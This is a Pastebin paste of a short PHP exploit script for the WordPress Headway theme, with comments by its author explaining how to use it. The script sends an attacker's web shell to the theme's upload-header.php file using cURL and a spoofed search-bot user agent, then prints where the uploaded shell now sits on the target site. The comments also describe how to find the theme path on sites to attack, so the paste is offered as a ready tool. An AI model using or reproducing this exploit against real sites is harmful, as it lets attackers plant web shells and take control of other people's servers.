Advertisement
3xploit3r

headway upload shell exploit

Aug 23rd, 2016
279
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.48 KB | None | 0 0
  1. <?php
  2.  
  3.  
  4. /*
  5. link of tool with vedio : http://magsec.blogspot.com/2015/10/wordpress-headway-upload-shell-exploit.html
  6. coded by mr magnom
  7. more tools visit my blog  ==> magsec.blogspot.com  :)
  8.  
  9. so why i didnt make auto exploiter because theme headway dont have one name
  10. for example u will filn /headway-2014/ and  /headway-2015/ or /headway-163/  , /headway-120/
  11. so is soo defficult to make auto exploiter so u must cheek firstly complet name of theme than
  12.  
  13. write it on site.com/wp-content/themes/headway(complet name)/library/visual-editor/lib/upload-header.php
  14.  
  15. shell go to  : site/wp-content/uploads/headway/header-uploads/shell is stabl for all site
  16.  
  17. that script on php for exploit site by site :/
  18.  
  19. to understand good watch video : http://magsec.blogspot.com/2015/10/wordpress-headway-upload-shell-exploit.html
  20. */
  21.  
  22.  
  23. $url=""; // link here
  24. $file="";   // ur shell here
  25. $post = array('Filedata'=>"@$file") ;
  26. $ch = curl_init();
  27. curl_setopt ($ch, CURLOPT_URL, "$url");
  28. curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
  29. curl_setopt($ch, CURLOPT_POST, true);
  30. curl_setopt($ch, CURLOPT_POSTFIELDS,$post);
  31. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  32. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  33. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  34. $data = curl_exec($ch);
  35. curl_close($ch);
  36. //print $data;
  37. if($data=="1"){
  38.   echo "\nexploited\nshell : site/wp-content/uploads/headway/header-uploads/$file \n";
  39. }else{
  40.   echo "\nnot infected\n";
  41. }
  42.  
  43. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement